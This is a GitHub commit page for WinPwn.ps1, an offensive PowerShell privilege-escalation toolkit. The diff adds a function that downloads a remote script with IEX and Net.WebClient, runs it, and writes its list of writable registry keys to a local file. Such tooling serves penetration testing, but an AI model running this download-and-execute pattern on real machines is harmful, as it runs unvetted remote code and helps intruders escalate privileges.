Skip to content

Commit

Permalink
Update WinPwn.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
S3cur3Th1sSh1t committed May 18, 2020
1 parent e6bd52c commit 3b426ff
Showing 1 changed file with 8 additions and 1 deletion.
9 changes: 8 additions & 1 deletion WinPwn.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -2138,6 +2138,7 @@ function otherchecks
} Else {
Write-Host "Looks good! No system path can be written to by the current user." -ForegroundColor Green
}
Reg1c1de >> $currentPath\LocalPrivEsc\WritebleRegistryKeys.txt
}

function winPEAS
Expand All @@ -2160,6 +2161,12 @@ function winPEAS
REG DELETE HKCU\Console\ /v VirtualTerminalLevel /f
}

function Reg1c1de
{
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Reg1c1de.ps1')
Invoke-Reg1c1de
}

function privescmodules
{
<#
Expand Down Expand Up @@ -2193,7 +2200,7 @@ __ ___ ____
do
{
Write-Host "================ WinPwn ================"
Write-Host -ForegroundColor Green '1. itm4n´s Invoke-PrivescCheck'
Write-Host -ForegroundColor Green '1. itm4ns Invoke-PrivescCheck'
Write-Host -ForegroundColor Green '2. winPEAS! '
Write-Host -ForegroundColor Green '3. Powersploits privesc checks! '
Write-Host -ForegroundColor Green '4. All other checks! '
Expand Down

0 comments on commit 3b426ff

Please sign in to comment.